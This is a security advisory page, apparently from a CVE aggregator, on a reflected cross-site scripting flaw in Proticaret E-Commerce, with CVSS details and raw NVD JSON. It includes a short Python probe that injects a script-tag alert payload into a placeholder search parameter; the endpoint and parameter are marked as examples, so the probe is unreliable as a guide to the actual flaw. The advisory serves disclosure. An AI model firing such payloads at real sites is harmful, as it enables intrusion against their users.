Security Vulnerability Report
中文
CVE-2026-3953 CVSS 8.8 HIGH

CVE-2026-3953

Published: 2026-05-07 12:16:17
Last Modified: 2026-05-07 14:44:16

Description

Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Gosoft Software Industry and Trade Ltd. Co. Proticaret E-Commerce allows Cross-Site Scripting (XSS), Reflected XSS. This issue affects Proticaret E-Commerce: from v5.0.0 before V 6.0.1767.1383.

CVSS Details

CVSS Score
8.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Proticaret E-Commerce v5.0.0 至 V 6.0.1767.1383 之前版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests target_url = "http://target-url/search" # Replace with actual endpoint payload = "<script>alert('CVE-2026-3953_PoC');</script>" # Send malicious request params = {"q": payload} # Example parameter name response = requests.get(target_url, params=params) # Check if payload is reflected un-sanitized if payload in response.text: print("[+] Vulnerability detected: Reflected XSS") else: print("[-] Vulnerability not detected or patched")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3953", "sourceIdentifier": "[email protected]", "published": "2026-05-07T12:16:16.810", "lastModified": "2026-05-07T14:44:16.370", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Gosoft Software Industry and Trade Ltd. Co. Proticaret E-Commerce allows Cross-Site Scripting (XSS), Reflected XSS.\n\nThis issue affects Proticaret E-Commerce: from v5.0.0 before V 6.0.1767.1383."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://siberguvenlik.gov.tr/guvenlik-bildirimleri/detay/tr-26-0180", "source": "[email protected]"}]}}